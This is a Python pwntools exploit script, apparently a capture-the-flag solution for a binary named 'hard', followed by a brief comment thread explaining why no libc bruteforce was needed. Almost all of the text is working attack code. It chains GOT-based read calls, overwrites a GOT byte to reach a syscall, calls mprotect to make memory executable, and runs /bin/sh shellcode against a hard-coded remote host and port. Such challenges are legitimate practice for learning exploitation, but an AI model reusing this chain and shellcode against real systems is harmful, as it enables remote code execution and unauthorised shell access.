writeup_mprotect_hard.py

#!/usr/bin/env python


from pwn import *

context(os='linux', arch='amd64')

BINARY = './hard'


def call_func(func, rdi=0, rsi=0, rdx=0):
    ucall = 0x04005A0
    upop = 0x004005BA

    p = ''
    p += p64(upop)
    p += p64(0)
    p += p64(1)
    p += p64(func)
    p += p64(rdx)
    p += p64(rsi)
    p += p64(rdi)
    p += p64(ucall)
    p += 'A' * 56
    return p


def exploit():
    REMOTE = 1

    if REMOTE:
        r = remote('128.199.152.175', 10001)
    else:
        r = process(BINARY)

    elf = ELF(BINARY)

    shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

    read = 0x400400
    bin_sh = 0x601700
    overwrite_read = 0x60100f
    address_of_page = 0x601000
    page_size = 0x1000
    rwx = 7

    read_ow = ''
    read_ow += '\0' * 9 # padding
    read_ow += '\x7e' # syscall lsb

    shellcode = asm(shellcraft.amd64.sh())

    p = ''
    p += 'A' * 16 # padding
    p += 'B' * 8  # rbp
    p += call_func(elf.got['read'], 0, bin_sh, 0x40) # read(0, 0x601700, 0x20)
    p += call_func(elf.got['read'], 0, overwrite_read, 0xa) # read(0, 0x601018, 0xa) # returns 0xa at $rax
    p += call_func(elf.got['read'], address_of_page, page_size, rwx)  # return to syscall with $rax = 0xa, which means mprotect(0x601000, 0x1000, 0x7);
    p += p64(bin_sh)

    r.send(p)
    sleep(1)

    r.send(shellcode)
    sleep(1)

    r.sendline(read_ow)
    r.interactive()


if __name__ == '__main__':
    exploit()

Hello, @ray-cp!

Well, syscall instruction was located right near the read function, so we don't even have to bruteforce to locate it, because we could get exact libc version.

thank you very much. :)